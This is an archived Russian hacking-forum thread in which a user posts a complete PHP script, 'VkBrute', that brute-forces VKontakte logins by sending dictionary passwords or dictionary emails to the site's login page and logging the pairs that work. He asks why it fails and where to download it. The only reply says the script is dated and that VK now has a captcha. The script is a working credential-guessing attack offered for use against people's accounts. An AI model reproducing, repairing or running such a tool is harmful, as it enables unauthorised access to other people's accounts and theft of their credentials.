Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

PHP бурт ВК

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> PHP бурт ВК
Имя
Сообщение << Старые топики   Новые топики >>
PHP бурт ВК - 2011-01-30 22:22:12.820000   
romanzi

Сообщений: 11
Оценки: 0
Присоединился: 2011-01-30 22:17:20.733333
Вот короче нашёл в Интернете php скрипт брута ВК.

&lt;?php&nbsp; #&amp;-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|&nbsp;&nbsp; #&amp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; VkBrute v. 1.00&nbsp; #&amp;&nbsp;&nbsp;&nbsp;&nbsp; author Chaak(ICQ:868922)&nbsp; #&amp;-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|&nbsp;&nbsp; set_time_limit(0);&nbsp; #########################################################################&nbsp; $email = 'romanzi123@ukr.net';&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Мыло для брута&nbsp; $passw = '123456';&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Пасс для брута&nbsp; $dict = @file("dictionary.txt");&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Файл со словарем&nbsp; паролей или мыл. $type= 2;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Тип атаки 1-на одно мыло по словарю паролей, 2- на один пароль по словарю мыл. $result = "password.txt";&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Файл с паролем.&nbsp; $user_agent = "Opera/9.50 (Windows NT 6.0; U; ru)";# User-agent&nbsp; #########################################################################&nbsp; function brute($email,$pass) {&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $out = "GET /login.php?email=".$email."&amp;pass=".$pass." HTTP/1.0\r\n";&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $out .= "Host: vkontakte.ru\r\n";&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $out .= "User-Agent: $user_agent\r\n";&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $out .= "Cookie: income=1\r\n";&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; fwrite($fp,$out);&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $ans='';&nbsp;&nbsp;&nbsp; &nbsp; while(!feof($fp))&nbsp;&nbsp;&nbsp; &nbsp; {&nbsp;&nbsp;&nbsp; &nbsp; $ans.=fgets($fp,128);&nbsp;&nbsp;&nbsp; &nbsp; }&nbsp;&nbsp;&nbsp; &nbsp; fclose($fp);&nbsp;&nbsp; &nbsp; if(preg_match("/\b302 Found\b/is", $ans)) return true; else return false;&nbsp; }&nbsp; echo "VkBrute запущен..."; for($i=0;$i&lt;count($dict);$i++){&nbsp; $dict[$i]=trim($dict[$i]);&nbsp; if($type==1){ if(brute($email,$dict[$i])){&nbsp; &nbsp;&nbsp;&nbsp; $fp=fopen($result,'ab');&nbsp; &nbsp;&nbsp;&nbsp; fwrite($fp,$email.':'.$dict[$i]."\n");&nbsp; &nbsp;&nbsp;&nbsp; fclose($fp);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; exit();&nbsp; }&nbsp; }elseif($type==2){ &nbsp;&nbsp;&nbsp; if(brute($dict[$i],$passw)){&nbsp; &nbsp;&nbsp;&nbsp; $fp=fopen($result,'ab');&nbsp; &nbsp;&nbsp;&nbsp; fwrite($fp,$dict[$i].':'.$passw."\n");&nbsp; &nbsp;&nbsp;&nbsp; fclose($fp);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }&nbsp; } } ?&gt;
Так вот, я залил файл (скрипт), файл для паролей и с паролями. Запустил (это была проверка проги,в паролях лежал мой пароль от ВК) и его не взломало, хотя в архиве я собрал всего 4 пароля.

Писало, что будет белый экран - так оно и есть, но ничего не ломает.

И ещё, если не найдёте проблему скиньте на тему на сайте, где про брут ВК (прогу) рассказывается и где её можно скачать.
Post #: 1
RE: PHP бурт ВК - 2011-01-31 08:18:11.033333   
av0id

Сообщений: 3
Оценки: 0
Присоединился: 2011-01-30 20:18:38.653333
Это уже баян баянов) Тем более капча щас на ВК.
Post #: 2
Страниц:  [1]
Все форумы >> [В Сети] >> PHP бурт ВК







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.